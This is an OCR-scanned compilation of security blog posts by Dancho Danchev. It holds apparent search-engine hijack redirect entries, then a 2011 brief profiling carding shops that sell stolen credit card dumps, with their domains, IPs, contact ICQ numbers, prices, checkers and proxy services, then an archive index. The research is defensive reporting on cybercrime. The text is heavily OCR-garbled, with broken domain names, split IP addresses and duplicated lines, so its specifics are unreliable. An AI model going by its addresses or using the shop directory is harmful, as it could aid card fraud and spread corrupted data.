See related post: [10] Sampling Malicious Activity 
Inside Cybercrime-Friendly Search Engines 

www.google.com. =87.125.87.99; 

google, com. =87.125.87.103; 

google, com. a u. =87.125.87.104; 



www. google, com.au. =87.125.87.147; 
google, be.=77.125.87.148; 
www. google, be. = 77.125.87.149; 
google, com. br.=77.125.87.109; 
www. google, com. br. = 77.125.87.150; 
google, c a.=77.125.87.152; 
www. google, c a. = 77.125.87.153; 
google. ch.=77.125.87.155; 
www. google. ch. = 77.125.87.158; 
google, de. = 77.125.87.160; 
www. google, de. = 77.125.87.161; 
google, dk. =92.125.87.123; 
www. google, dk. =92.125.87.160; 
google, fr. =92.125.87.154; 
www.google.fr. =92.125.87.134; 
google, ie. =92.125.87.170; 
www. google, ie. =92.125.87.177; 
google.it. =92.125.87.173; 
www. google, it. =92.125.87.14 7; 
google, co.jp. =92.125.87.103; 



www. google, co.jp. =84.125.87.14 7; 
google.nl. =84.125.87.103; 
www. google, nl. =84.125.87.14 7; 
google, no. =84.125.87.103; 
www.google.no. =84.125.87.14 7; 
google, co. nz. =84.125.87.103; 
www. google, co. nz. =84.125.87.14 7; 
google.pl. =84.125.87.103; 
www.google.pl.=64.125.87.14 7; 
google.se. =64.125.87.103; 
www.google.se.=64.125.87.14 7; 
google, co. uk. =64.125.87.103; 
www. google, co. uk. =64.125.87.14 7; 
google, co.za. =64.125.87.103; 
www. google, co.za. =64.125.87.14 7; 
www. google-analytics. com. =64.125.87.101 
www.bing. com. =92.123.68.97; 
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search.yahoo, com. = 72.30.186.249; 
www.search.yahoo, com. = 72.30.186.249; 



uk. search.yahoo, com. =87.248.112.8; 

ca.search.yahoo, com. =100.6.239.84; 

de.search.yahoo.com. =87.248.112.8; 

fr. search, yahoo, com. =87.248.112.8; 

a u. sea rch .yahoo, com. =87.248.112.8; 

ad-emea. doubleclick.net.=64.125.87.101; 

www.statcounter. com. =64.125.87.101; 

[11] The Liza moon mass SQL injection connection 

The same email used to register the SQL injected domains 
jamesnorthone@hotmaiibox.com has been used to 

register the Liza moon mass SQL injection attack domains 
extensively profiled here - " [12]Dissecting the Massive 
SQL 

Injection Attack Serving Scareware". 

Related posts: 

• [13JSQL Injection Through Search Engines Reconnaissance 

• [14]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [15]Massive SQL Injection Attacks - the Chinese Way 

• [16]Cybercriminais SQL Inject Cybercrime-friendly Proxies 
Service 



• [17]GoDaddy's Mass Word Press Blogs Compromise 
Serving Sea re ware 

• [18]Dissecting the Word Press Blogs Compromise at 
Network Solutions 

• [19]Yet Another Massive SQL Injection Spotted in the Wild 

• [20]Smells Like a Copycat SQL Injection In the Wild 

• [21 jFast-Fluxing SQL Injection Attacks 

• [22]0bfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [23]Dancho 
Danchev's blog. Follow him [24]on Twitter. 
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Exposing the Market for Stolen Credit Cards Data 
(2011-10-31 02:07) 

What's the [ljaverage price for a stolen credit card? 
How are [2]prices shaped within the cybercrime 

ecosystem? 

Can we talk about [3] price discrimination within the 
underground marketplace ? Just how easy is to purchase 



































stolen credit cards known as dumps or full dumps, 
nowadays? 

In this intelligence brief, I will expose the market for stolen 
credit cards data, by profiling 20 currently active and 
responding gateways for processing of fraudulently 
obtained financial data. 

Key summary points: 

• Tens of thousands of stolen credit cards a.k.a. dumps and 
full dumps offered for sale in a DIY market fashion 

• The majority of the carding sites are hosted in the Ukraine 
and the Netherlands 

• Liberty Reserve is the payment option of choice for the 
majority of the portals 

• Four domains are using Yahoo accounts and one using 
Live.com account for domain registration 

• Four of the domains are using identical name servers 

• Each DIY gateway for processing of fraudulently obtained 
financial data has a built-in credit cards checker or 

offers links to external sites performing the service 

• Several of the fraudulent gateways offered proxies-as-a- 
service, allowing cybercriminals to hide their real IPs by 
using the malware infected hosts as stepping stones 

The dynamics of the cybercrime ecosystem share the same 
similarities with that of a legitimate marketplace. From 

seller and buyers, to bargain hunters, escrow agents, 
resellers and vendors specializing in a specific market 



segment, all the market participants remains active 
throughout the entire purchasing process. With ZeuS and 
SpyEye crimeware infections proliferating, it's shouldn'd be 
surprising that the average price for a stolen credit card is 
decreasing. 

With massive dumps of credit card details in the hands of 
cybercriminals, obtained through [4] ATM skimming and 
crimeware botnets, the marketplace is getting over-crowded 
with trusted propositions for stolen credit card details. 

What used to be a market where over-the-counter trade was 
the primary growth factor, is today's highly standardized 
marketplace with DIY online interfaces, allowing anyone to 
join and purchase stolen credit card details. Naturally, the 
vendors of dumps and full dumps are vertically integrating 
within the marketplace, and are offering additional services 
such as checkers for credit cards validity, and proxies-as-a- 
service - [5 jcompromised malware infected hosts - 
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allowing a potential cybercriminal to opportunity to hide 
their IP while using the recently purchased credit cards 
data. 

How are prices shaped within this new and standardized 
market model offered commodity goods such as 

stolen credit cards, and is price discrimination for the stolen 
credit cards even feasible? The vendors are currently 
offered fixed prices for the majority of credit cards, with 
slight increases in the price of a stolen credit card, if the 
card is Premium. Bulk orders are naturally also considered 
as a growth factor the DIY interfaces, with slight discounts 
being offered for bulk orders. 



As far as [6] price discrimination is concerned, the 
concept is long gone, and has become the victim of this 
ongoing standardization of the market. The same goes for 
penetration pricing, as the vendors of stolen credit cards 
details are now enjoying a better underground market 
transparency into the fraudulent propositions of competing 

portals, helping them to set the prices more easily, without 
the need to lower the price in order to enter the market 
segment. 

Let's profile the 20 gateways for processing of fraudulently 
obtained financial data. 

Responding IPs, registered emails, name servers, 
ASs, associated ICQ numbers, geolocation of the 
hosting IP 

is as follows: 

ccmaii.cc - 213.5.70.34 - Name server: 
TRl.0NLINE5H0P.su - Email: gwylhcfktm@whoisservices.cn 
- AS49544, 

INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS 

track2.name - 91.213.175.121 - AS6849, UKRTELNETJSC 
UKRTELECOM - HOSTED IN UKRAINE 

trackstore.su - 46.21.148.26 - Email: 
roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED 
IN THE NETHERLANDS 

magic-numbers.cc - 91.213.175.89; 


91.223.77.35 Name server: 



NS1.1000DNS. NET - Email: 


con- 

tact@privacyprotect.org - AS6849, UKRTELNETJSC 
UKRTELECOM - HOSTED IN UKRAINE 

allfresh.us - 46.21.144.115 - Name server: 
YNSl.YAHOO.COM - Email: keikomiyahara@yahoo.com - 
AS35017, 

SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 
freshstock. biz - 38.97.225.166; 

69.175.73.184 - Name server - NS1.PIPEDNS.COM Email: 
ghmbfvn- 

txs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. 

- HOSTED IN THE UNITED STATES 

bulba.cc - 91.223.77.254 - Name server: 
NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, 
UKRTELNET 

JSC UKRTELECOM - HOSTED IN UKRAINE 

approven.su - 91.229.248.20 - Name server: 
dnsl.naunet.ru - Email: yurtan20@el.ru - HOSTED IN 
UKRAINE 

cv2shop.com 


72.20.12.205 



Name 


server: 

DN51. NAME-SERVICES. COM 


Email: 

wn- 

fxgjdg@whoisprivacyprotect.com -AS25761, STAMINUS- 
COMM - HOSTED IN THE UNITED STATES 

vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - 
Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C 

SAKURA Internet - HOSTED IN JAPAN 

ccStore.ru - 91.220.101.200 - Name server: 
nsl.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - 
HOSTED IN 

THE NETHERLANDS 

dumps.cc redirects to privateservices.ws and 
trackservices.ws -124.217.247.59 - Name server: 
NS1.IPSTATES.NET- 

Email: dumps.cc@domainsproxy.net - AS45839, PI RADI US¬ 
AS PI RADI US NET - HOSTED IN MALAYSIA 

privateservices.ws - 217.23.9.92 -Name server: 
nsl.servicedns.nl - AS49981, WorldStream AS Maasdijk - 
HOSTED IN 



THE NETHERLANDS 


perfect-numbers.cc - 91.220.101.75 - Name server: 
NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko 
Sergey Nikolaevich; icq: 605099359 - HOSTED IN THE 
NETHERLANDS 

mega4u.biz -178.162.174.71 - Name server: 
NS1.FREEDNS. 1 / 1/5 - Email: persiks@onHne.ua - AS28753, 
LEASEWEB-DE 

- HOSTED IN GERMANY 

accessltd.ru - 91.213.175.167 - Name server: 
nsl4.zoneedit.com - Email - admin@accessltd.ru - AS6849, 
UKRTELNET 

JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - 
HOSTED IN UKRAINE 

pwnshop.cc - 77.79.13.209 - Name server: 
NS1.AFRAID.ORG - AS 16125, DC-AS UAB - HOSTED IN 
LITHUANIA 

bestdumps.su - 91.213.175.57 - Name server: 
nsl.1000dns.net - Email: bestdumpssu@live.com ICQ : 
619429330 - 
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AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN 
UKRAINE 

mycc.su -188.93.17.180 - Name server: 
nsl.deltahost.com.ua - Email: admin@mycc.su - AS49505, 
SELECTEL Ltd. - 


HOSTED IN RUSSIA 


bestdumps.biz -195.3.145.87 - Name server: 
NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - 
AS50244 - 

HOSTED IN LATVIA, Associated email: 
bdsupport@jabber.org, Associated ICQ: 655584 

dumpshop.bz - 217.23.9.93 - Name server: 
nsl.servicedns.nl - Email: contact@privacyprotect.org; 
AS49981, 

WorldStream; HOSTED IN THE NETHERLANDS 

cardshop.bz - 217.23.9.67 - Name server: 
nsl.servicedns.nl - Email: contact@privacyprotect.org; 
AS49981, WorldStream; HOSTED IN THE NETHERLANDS 

Let's now take an inside view into each and every of the 
above-profiled gateways. 

_accessltd.ru 

Accessltd.ru is currently offering an inventory of 39328 
U.S based stolen credit card details for just $2.10 each, 
followed by another inventory of 342 U.K based credit cards 
for $9 each, and 108 Japanese based credit cards for $8 

each, with another dump of 293 Canadian credit cards for 
$7 each, and 198 Australian based credit cards for $8 each. 

According to the service - " We accept Liberty Reserve 
only.Refund on your wallets is not possible. " 

Moreover, here's how the service operates based on the 
Service Rules: 



" To check the card is integrated into the platform checker 
CCChecker, currently the best checker, not only in our 
opinion. Replacement cards are only based on the result of 
this checker. Check Card is available immediately after 
order payment, in the section My Orders. To check, dick 
"Check". Cards checking in for a few seconds. Button 
"Check" 

- available within 20 minutes after purchase. Check Card - a 
paid service, which costs $ 0.3, if the card is not valid - 

the cost of cards back to your 
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account automatically. 

Replacement card can only be made in the automatic mode. 
If checker dont working, for replace need screens 

your checker in the Support section with a description of the 
problem. These tickets will only be considered if they 
contain the results of your test, not a "paid for Skype, did 
not work, replace". We do not care where and how you use 
the material, loading support extra information is 
needed. We will check the card manually, and if any 
parameter is not correct to make you refund. Sorting: 

Our shop is available sorted by the following parameters: 

1. BIN ( Multiple) 

2. State (Multiple) 

3. City (Multiple) 


4. Zip (Multiple)" 

Domain reconnaissance 

accessltd.ru - 91.213.175.167 - Name server: 
nsl4.zoneedit.com - Email - admin@accessltd.ru - AS6849, 
UKRTELNET 

JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - 
HOSTED IN UKRAINE 

AIIFresh.us 

AIIFresh.us is yet another DIY shop for purchasing stolen 
credit card details, all fresh as the name says. 

On 2011/08/04 the service issued updates for " updated 
US Amex, Discover fresh and good", followed by 
another update on the next day, this time advertising " 
updated more cvv Franc he new and good today. " 

The price for a stole card number is static and is $6 per 
credit card. 
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Domain reconnaissance 
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allfresh.us - 46.21.144.115 - Name server: 
YN51.YAHOO.COM - Email: keikomiyahara@yahoo.com - 
A535017, 

SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 

_Approven.su 

Approven.su is a relatively more advanced DIY shop for 
purchasing of stolen credit card details, due to to its 
advanced search options, allowing cybercriminals an easier 
way for searching into the the dumps/full dumps of stolen 
credit card details. 

The most recent annoucement at Approven.su says " 
Sumer Jam: 8 new bases - Georgia 2, California3, Pennsyl- 
vania3, Puerto Rico, California4, Texas4, Virginia, 
California5". 

The price for a stolen credit card is $10, with Platinum cards 
going for $15. 
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Domain reconnaissance 

approven.su - 91.229.248.20 - Name server: 
dnsl.naunet.ru - Email: yurtan20@el.ru - HOSTED IN 
UKRAINE 


BestDumps. biz 

BestDumps.biz doesn't allow newly registered visitors the 
opportunity to search across its database of stolen credit 
card details, unless they pay $50 using Liberty Reserve. 
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Domain reconnaissance 

bestdumps.biz -195.3.145.87 - Name server: 

N51. BESTDUMPS. BIZ - Email: admin@bestdumps.biz - 
A550244 - 

HOSTED IN LATVIA, Associated email: 
bdsupport@jabber.org, Associated ICQ: 655584 

_Buiba.cc 

Bulba.cc offers a Checker for stolen credit cards. 

The most recent announcement is "UPDATE ADDED 1000 

MEXICO RARE! FRESH! 95 % VALID!!! Hurry up to load the 
account". 

The service advertised itself as follows: 

" Hello my name is Bulba. I am official reseller of 
TRACK2.NAME service. Bulba.cc opened because 
track2.name dosed registration and don't accept new 


customers. We don't have any specific rules. Our only rule is 
"we don't replace bad dumps". That means we don't 
replace them at all and we don't have replacement policy. 
Don't ask about it in any case! 

We accept Libery Reserve, WU, MG, Bank Transfer (NEW) 
without any fees. Minimum for payment by LR -10 

$, WU, MG - 500 $, Bank Transfer - 500 $. Also we give 10 % 
bonus of money to all purchases. 

Our bases: SALES - track2, 50 % valid, alot dumps! Very 
cheap $7 per one! DATABASE9 - TRACK1+TRACK2(90 

%) + TRACK2(10 %) only! 80 % valid, FRESH. NEW 
DATABASE, TRACK 2 only, 95 % valid, FRESH! NEW! " 
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Domain reconnaissance 

bulba.cc - 91.223.77.254 - Name server: 
NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, 
UKRTELNET 

JSC UKRTELECOM - HOSTED IN UKRAINE 

_CardShop.bz 


CardShop.bz is yet another DIY interface for purchasing 
stolen credit cards data (dumps/full dumps). The general 
rules of the site are as follows: 

2.1.1) All calculations on a site and its services - automatic 

2.1.2) Minimum funding amount on a site 10 $ that equals 
to 50 credits 

871 

2.1.3) Period of validity of credits is 1 month (under the 
additional oral agreement term can be increased). In a case 
if you had not time to spend all credits, it is possible to 
make fund of your account and credits will automatically be 
restored 

2.1.4) Refund for not used credits - IS NOT POSSIBLE 

In order to avoid conflict situations, please check 
information that you need before funding account 

The Rules of service ONLINE sale CC/DUMPS reads: 

"2.2) Rules of service ONLINE sale CC/DUMPS 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked before purchase and have status VALID - 

IS NOT POSSIBLE 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked in 1 hour after purchase through the link 

'Check' and having status VALID - IS NOT POSSIBLE 

2.2.2) Return of credits for purchased invalid CC/Dumps 
(DECLINE/HOLD CALL/PICKUP) which are not checked before 



purchase, is possible only within 24 hours after the order. 
After 24 hours any claims on return of credits are not 
accepted 

2.2.3) You will not be charged for invalid CC/Dumps if you 
checked it instant or in 1 hour and credits will be refunded 
automatically. You will be charged only for CC/Dumps 
checking even if CC/Dumps is invalid 

2.2.4) We do not guarantee limits and amounts on 
CC/Dumps 

2.3) Rules of service ONLINE Check CC/Dumps 

2.3.1) Status Valid, means that at the moment of check 
CC/Dump was Approved 

2.3.2) Status Declined, means that at the moment of check 
CC/Dump was Decline/Pickup/Hold Call 

2.3.3) Claims on checked DUMP/CC are not accepted. 

2.7) Rules of other services on site CardShop will be added 
in this agreement later 

3) Prices and Tariffs 

3.1.1) 1 credit is accepted to a unit of account on site 
CardShop. Initially 1 credit = 1 $. The price for 1 credit can 
change according to tariffs for funding. Tariffs could be 
found in Tariff section at site 

3.1.2) Administration CardShop reserves the right to itself at 
any moment to change tariffs. You agree periodically check 
tariffs on site CardShop to learn about possible changes in 
them" 



The is currently offering 33903 U.5 based stolen credit cards 
for sale. The web site is also offering Proxies for sale - 
compromised malware infected hosts- where the price is 0.3 
$ per proxy. Next to the inventory of stolen credit cards and 
the proxy service, the web site is also offering batch 
checking for the validity of the stolen credit cards, and is 
also performing Lookups SSN/MMN services, with the ability 
to Lookup MMN in California state. 
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Domain reconnaissance 
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cardshop.bz - 217.23.9.67 - Name server: 
nsl.servicedns.nl - Email: contact@privacyprotect.org; 
A549981, WorldStream; HOSTED IN THE NETHERLANDS 

_CcMall.cc 

CcMall.cc is associated with the following ICQ number 
777605, where potential buyers would have to connect with 
the seller in order to be offered the ability to register in the 
site. " For private limited registration only into the new 
shop" is currently displayed on CcMall.cc's web site. 


Domain reconnaissance 


ccmall.cc - 213.5.70.34 - Name server: 
TR1.0NUNESHOP.5U - Email: gwylhcfktm@whoisservices.cn 
- AS49544, 

INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS; Name 
server: trl.onlineshop.su - Ernaill: exchangers@msn.com 
context, cx is also registered using exchangers@msn.com. 

_ccStore.ru 

ccStore.ru is associated with the following ICQ - 20606, and 
requires that a valid email address is supplied in order to 
activate the access to yet another interface for selling and 
reselling fraudulently obtained financial data. 
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Domain reconnaissance 

ccStore.ru - 91.220.101.200 - Name server: 
nsl.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - 
HOSTED IN 

THE NETHERLANDS 

_Cv2Shop.com 

Cv2Shop.com has an inventory of 734 U.S based stolen 
credit cards for the price of Discovery - $2.2 per piece; 
Amex for $2; Mastercard for $2; Visa for $1.7 per piece. The 
fraudulent interface is also offering 80 Canadian stolen 
credit 875 


cards for the price of $7 per piece for Discovery and Annex, 
and for $6 for Mastercard and $5 for Visa. 

Domain reconnaissance 

cv2shop.com 


72.20.12.205 


Name 

server: 

DNS1. NAME-SERVICES. COM 


Email: 


wn- 

fxgjdg@whoisprivacyprotect.com -AS25761, STAMINUS- 
COMM - HOSTED IN THE UNITED STATES 

_ FreshStock. biz 
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FreshStock.biz is associated with the following ICQ - 
607373112 where users have to initiate the contact in order 
to obtain access to the DIYshop for stolen credit cards.. 


Domain reconnaissance 
freshstock. biz - 38.97.225.166; 

69.175.73.184 - Name server - NS1.PIPEDNS.COM Email: 
ghmbfvn- 

txs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. 
- HOSTED IN THE UNITED STATES 

_ Magic-Numbers, cc 

Magic-Numbers.cc is associated with the following ICQ - 
333277 and Jabber: elche@jabber.org where users wanting 

bulk orders have to contact the cybercriminals offering the 
DIY interface for stolen credit card numbers. 

The web site is currently offering 24642 U.S based stolen 
credit cards, followed by another 1545 Israeli based 

credit cards, with a total dumps currently being offered at 
43,507. The most recent advertisements read: "Australia 
base, ultra virgin fresh base - track2 available. Approval 
rate 85 %" 
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Domain reconnaissance 


magic-numbers, cc - 91.213.175.89; 
91.223.77.35 Name server: 

NS1.1000DNS. NET - Email: 
con- 

tact@privacyprotect.org - AS6849, UKRTELNETJSC 
UKRTELECOM - HOSTED IN UKRAINE 

_Mega4u.biz 
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mega4u.biz is currently closed for free registration. 

Domain reconnaissance 

mega4u.biz -178.162.174.71 - Name server: 
NS1.FREEDNS. 1/1/5 - Email: persiks@online.ua - AS28753, 
LEASEWEB-DE 

- HOSTED IN GERMANY 

_MyCc.su 

MyCc.su is associated with the following ICQ - 40040000 
and next to offering stolen credit cards for sale, is also 
soliciting for security vulnerabilities - " Found a bug? We will 
pay! ". The latest update from September 29 says that 1500 
EU based stolen credit cards have been added, followed by 
another update from the same date, this time with 

300 French based stolen credit cards added. 


The price of the stolen credit cards varies between $2 and 
$5 
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Domain reconnaissance 
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mycc.su -188.93.17.180 - Name server: 
nsl.deitahost.com.ua - Email: admin@mycc.su - AS49505, 
5ELECTEL Ltd. - 

HOSTED IN RUSSIA 

_ Perfect-Numbers, cc 

Perfect-Numbers.cc is yet another DIY interface for 
purchasing stolen credit cards. It's associated with teh 
following ICQ - 605099359. Users are able to search within 
the interface only after they have refilled their balance 
using Liberty Reserve as a means for payment. 

Domain reconnaissance 
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perfect-numbers.cc - 91.220.101.75 - Name server: 
NS1.1000DNS.NET - AS49704, ADD05-AS FOP Litvinenko 
Sergey Nikolaevich; icq: 605099359 - HOSTED IN THE 
NETHERLANDS 

PrivateServices. ws 

privateservices.ws currently has a database of 634 U.K 
based stolen credit cards, and another 293 French based 

stolen credit cards. 
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Domain reconnaissance 

privateservices.ws - 217.23.9.92 -Name server: 
nsl.servicedns.nl - AS49981, WorldStream AS Maasdijk - 
HOSTED IN 

THE NETHERLANDS 

_pwnshop.cc 

pwnshop.cc is yet another DIY interface for selling stolen 
credit card numbers. The web site is currently returning the 
following message: " You can obtain registration code only 
from exist clients.Please be aware of scam - registration 


code is free for exist clients, so if you pay for it - as for 
refund. " 
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Domain reconnaissance 

pwnshop.cc - 77.79.13.209 - Name server: 
N51.AFRAID.ORG - AS 16125, DC-A5 UAB - HOSTED IN 
LITHUANIA 

_ TrackStore.su 

trackstore.su is offering existing clients to option to refer 
additional customers for the price of $20 each. The web site 
is currently offering 1648 U.S based stolen credit cards, 
exclusively from the Suntrust Bank for the price of $10 
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for each stolen credit card. 
887 


2 


Domain reconnaissance 
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trackstore.su - 46.21.148.26 - Email: 
roger.sroy@yahoo.com - A535017, SWIFTWAY-AS - HOSTED 
IN THE NETHERLANDS 

_Track2.name 

track2.name is offering stolen credit card numbers for the 
price of $20 for each stolen credit card. 
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Domain reconnaissance 

track2.name - 91.213.175.121 - AS6849, UKRTELNETJSC 
UKRTELECOM - HOSTED IN UKRAINE 

vzone.tc 

vzone.tc is yet another DIY shop for stolen credid card 
numbers. The current announcement reads : " Dear users, 
after you buy cards, to view proper information, please dick 
download all cards or download selected card from My 
Cards page. It will show you all information like Last Name 
and ail the additional info like phone, email. 

P.S If you dislike new shop V.2 of our shop, then please use 
support link and send us your feedback to admin, if you 
want to back old shop V.l then send feedback with proper 
reasons why u again want to see old shop V.l" 

The current price for a stolen credit card is $1.80 for every 
card. Next to offering stolen credit cards as a service, the 
shop is also offering SSN and DOB Searcher, next to the 
opportunity for customers of the shop to also 


purchase proxies - compromised malware infected hosts. 
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Domain reconnaissance 
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vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - 
Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C 

SAKURA Internet - HOSTED IN JAPAN 

_ DumpsSheck. com 

dumpscheck.com is associated wit the following ICQ - 
612303315 is an advanced checker for the validity of stolen 

credit card details. The web site says " Current merchant 
accepts VISA, MASTERCARD, AMEX, DISCOVER, DINERS, 

JCB. " 
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Domain reconnaissance 

dumpscheck.com - 206.217.196.47 - Name server: 
N51.DUMP5CHECK.COM - Icq 612303315; A54436, NLAYER 

Communications; Inc. - HOSTED IN THE UNITED STATES 

Related posts on the economics of cybercrime: 

[7] New report details the prices within the 
cybercrime market 

[ 8 ] CardCops: Stolen credit card details getting 
cheaper 

[9] Microsoft study debunks profitability of the 
underground economy 

[10] Are Stolen Credit Card Details Getting Cheaper? 

[11 ]Squeezing the Cybercrime Ecosystem in 2009 

[12[Price Discrimination in the Market for Stolen 
Credit Cards 

[13] The Underground Economy's Supply of Goods 

[14] Microsoft study debunks phishing profitability 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 
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Summarizing ZD Net's Zero Day Posts for October 
(2011-12-04 21:05) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for October. You can subscribe to my 

[ljpersonai RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3 7 #Phone 5 themed emails serve Windows 
malware 

02. [4]27 of 100 tested Chrome extensions contain 51 
vulnerabilities 

03. [5]37 percent of users browsing the Web with 
insecure Java versions 

04. [6]Coogle introduces Safe Browsing Alerts for 
network administrators 












05. [7]Malware Watch: U.S Chamber of Commerce 
official letter; DHL delivery error, IRS notifications 
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06. [ 8 ]' Steve Jobs Alive!' emails lead to exploits and 
malware 

07. [9]Which is the most popular malware 
propagation tactic? 

08. [lOJSpamvertised 'Cancellation of the package 
delivery' emails serving malware 

09. [HJHacking group from Nepal posts 10,000 stolen 
Facebook accounts online 

10. [12]Over a million web sites affected in mass SQL 
injection attack 

11. [13]New Mac OS X malware disables Apple's 
malware protection 

12. [14]New Mac OS X malware with DDoS 
functionality spotted in the wild 

13. [15]Security researcher finds major security flaw 
in Facebook 

This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17]on Twitter. 

1. htto.V/www.zdnet.com/tooics/dancho+danchev? 
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neDal-DOSts-10000-stolen-facebook-accounts-online/9 
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12. htto://www.zdnet. com/blog/securitv/over-a-million-web- 
sites-affected~in~mass-sal-iniection-attack/9662 

13. http://www.zdnet, com/blog/securitv/new-mac-os-x- 
malware-disables-a o Dles-malware-orotection/9665 
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15. http://www.zdnet.com/bloa/securitv/securitv-researcher- 
finds-maior-securitv-flaw-in-facebook/9704 
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Twitter Soam Campai gn (2010-06-16 14:32 ) 

■ Sampling 419 Advance Fee Scams Activit y 
(2010-06-17 16:25 ) 

■ Money Mule Recruiters Trick Mules into installin g 
Fake Transaction Certificates (2010-06-29 11:07 ) 

July. 

■ Summarizing Zero Day’s Posts for tune (2010- 
07-05 21:35 ) 

■ C vbercriminals SOL Inject Cvbercrime-friendl v 
Proxies Service (2010-07-13 23:00 ) 

■ Exploits , Malware , and Scareware Courtesy of 
AS6851 , BKCNET . Saaade Ltd. (2010-07-14 
19:54 ) 

■ Sampling Malicious Activity Inside Cvbercrime- 
Friendlv Search Engines (2010-07-15 17:44 ) 

■ S oamvertised Amazon “Verify Your Email" , "Your 
Amazon Order" Malicious Emails (2010-07-16 
21:17 ) 

■ Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campai gn (2010-07-19 
20:26 ) 

■ ZeuS Crime ware Serving 123Greetings Ecard 
Themed Campaign in the Wild (2010-07-20 
23:40 ) 

August 

■ Summarizing Zero Day's Posts for lulv (2010-08- 
02 14:54 ) 

■ S oamvertised Best Bu y. Mac v's, Evite and Tar get 
Themed Scareware/Exoloits Serving Campai gn 



























































































(2010-08-09 14:19 ) 

■ Dissecting a Scareware-Servino Black Hat SEP 
Campaign Using Compromised .NU.CH Sites 
(2010-08-13 17:09 ) 

o September 

■ Historical OS (NT: Celebrities Death . Fed ex 
Invoices , Office-Themed Malware Campai gns 
(2010-09-08 21:07 ) 

■ Summarizing 3 Years of Research Into Cyber 
jihad (2010-09-11 16:24 ) 

2011 

o lanuar v 

■ To d Ten Must-Read DDanchev Posts For 2010 

(2011-01-22 00:25 ) 

■ To o Ten Must-Read Posts at ZDNet's Zero Day for 
2010 (2011-01-22 12:06 ) 

■ S oamvertised "Your password has been stolen!" 
Malware Campaign Circulatin g (2011-01-26 
20:30 ) 

■ Keeping Money Mule Recruiters on a Short Leash 

- Part Five (2011-01-31 12:58 ) 

■ Keeping Money Mule Recruiters on a Short Leash 

- Part Five (2011-01-31 12:58 ) 
o Februar y 

■ (2011-02-09 12:43 ) 

■ S oamvertised Portfolio of 
Fraudulent/Pharmaceutical Domains (2011-02- 
14 20:14 ) 

■ A Diverse Portfolio of Fake Security Software - 
Part Twenty Five (2011-02-15 16:06 ) 

■ Bogus Adult Content SP/M-ed Over ICO (2011- 
02-16 13:25 ) 

■ Sampling 419 Advance Fee Scams Activity - Part 
Two (2011-02-21 13:54 ) 

■ Summarizing Zero Day's Posts for Februar y 
(2011-02-28 15:59 ) 






































































o March 

■ Compromised University Leads to Fraudulent 
Gooale Brand-iacked Pharmaceutical Ads (2011- 
03-07 14:08 ) ' 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Six (2011-03-10 14:45 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Six (2011-03-10 14:45 ) 

■ S oamvertised DHL Notification Malware 

Campaign (2011-03-10 15:29 ) 

■ Compromised University Leads to Fraudulent 
Pharmaceutical Ads (2011-03-10 16:53 ) 

■ More Soamvertised DHL Notifications Spread 
Malware (2011-03-11 15:31 ) 

■ S oamvertised FedEx Notifications Spread 
Malware (2011-03-16 18:14 ) 

■ Compromised Universities Leads to Fraudulent 
Pharmaceutical Ads (2011-03-16 19:30 ) 

■ S oamvertised United Parcel Service notifications 

serve malware (2011-03-23 15:54 ) 

■ S oamvertised Post Office Express Mail (USPS ) 
Emails Serving Malware (2011-03-25 18:20 ) 

■ Dissecting the Massive SOL Injection Attack 
Serving Scareware (2011-03-31 19:54 ) 

■ Dissecting the Massive SOL Injection Attack 
Serving Scareware (2011-03-31 19:54 ) 

° Aorii 

■ S oamvertised DHL Notifications Scareware 

Campai gn (2011-04-04 16:44 ) 

■ Summarizing Zero Day's Posts for March (2011- 
04-04 18:56 ) 

■ Don't Plav Poker on an Infected Table - Part Four 
(2011-04-11 18:10 ) 

■ S oamvertised "Reoest Rejected" Campai gn 
Serving Scareware (2011-04-12 20:22 ) 



















































































■ S oamvertised "Successful! Order 977132" Leads 

to Scareware (2011-04-28 14:50 ) 

Mav 

■ Summarizing ZDNet's Zero Dav Posts for Aori! 
(2011-05-09 12:50 ) 

■ Don't Plav Poker on an Infected Table - Part Five 
(2011-05-09 15:52 ) 

■ A Peek inside a New DDoS Bot - "Snap" (2011- 
05-09 17:03 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Seven (2011-05-10 12:41 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Eight - Historical OS!NT (2011-05-25 
13:18 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Eight - Historical OS!NT (2011-05-25 
13:18 ) 

■ A Peek inside the Vertex Net Loader (2011-05-26 
16:34 ) 

■ A Peek inside the Vertex Net Loader (2011-05-26 
16:34 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Nine (2011-05-30 12:09 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Nine (2011-05-30 12:09 ) 
tune 

■ Summarizing ZDNet's Zero Dav Posts for Ma v 
(2011-06-08 16:24 ) 

July. 

■ Summarizing ZDNet's Zero Dav Posts for tune 
